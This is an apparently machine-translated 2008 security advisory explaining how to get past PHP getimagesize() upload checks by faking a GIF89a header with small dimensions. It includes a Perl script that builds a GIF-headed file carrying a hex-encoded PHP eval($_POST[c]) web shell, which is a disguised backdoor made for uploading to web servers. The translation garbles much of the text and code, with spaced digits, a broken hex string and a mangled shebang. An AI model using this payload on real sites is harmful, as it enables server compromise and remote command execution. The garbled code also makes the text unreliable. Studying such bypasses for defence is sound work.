Bypass getimagesize()function defect-vulnerability warning-the black bar safety net

2008-09-10T00:00:00
ID MYHACK58:62200820321
Type myhack58
Reporter 佚名
Modified 2008-09-10T00:00:00

Description

By: the superhei

A lot of php code using getimagesize()to determine if your Upload file is not image, a lot of people in the Black-Box testing will be used in the php code before adding a GIF89a to bypass such code:

if(getimagesize($file)){ print yes; }else{ print No.; }

But there are many cases there are other restrictions, such as resolution of n x n as in the following code:

if ($size = @getimagesize(IMAGES."avatars/".$ avatarname)) { if ($size['0'] > 1 0 0 || $size['1'] > 1 0 0) { unlink(IMAGES."avatars/".$ avatarname); $set_avatar = "";

First look at the gif file header:

00000000h: 4 7 4 9 4 6 3 8 3 9 6 1 AB 0 2 E5 0 3 B3 0 0 0 0 0 0 8 0 0 0 ; GIF89a???..?. G I F 8 9 a $size['0'] $size['1'] $size['0']x$size['1'] = [AB 0 2]6 8 3 x [E5 0 3]9 9 7

perl code:

!/ usr/bin/perl

The Script could pass getimagesize()

gif size: 99x98 pixels

$gifhead="\x47\x49\x46\x38\x39\x61". #GIF89a "\x63\x00".# 9 9 "\x62\x00";#9 8

$phpcode="\x3c\x3f\x70\x68\x70\x20\x40\x65\x 76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x63\x5d\x29\x3f\x3e";#<? php @eval

($_POST[c])?& gt;

print $gifhead.$ phpcode;

It should be said getimagesize just a part of the detection of this and other vulnerabilities with, such as local contains General wear on strictly limiting the packet type is also used getimagesize judgment is not the picture. For example: http://www.4ngel.net/article/57.htm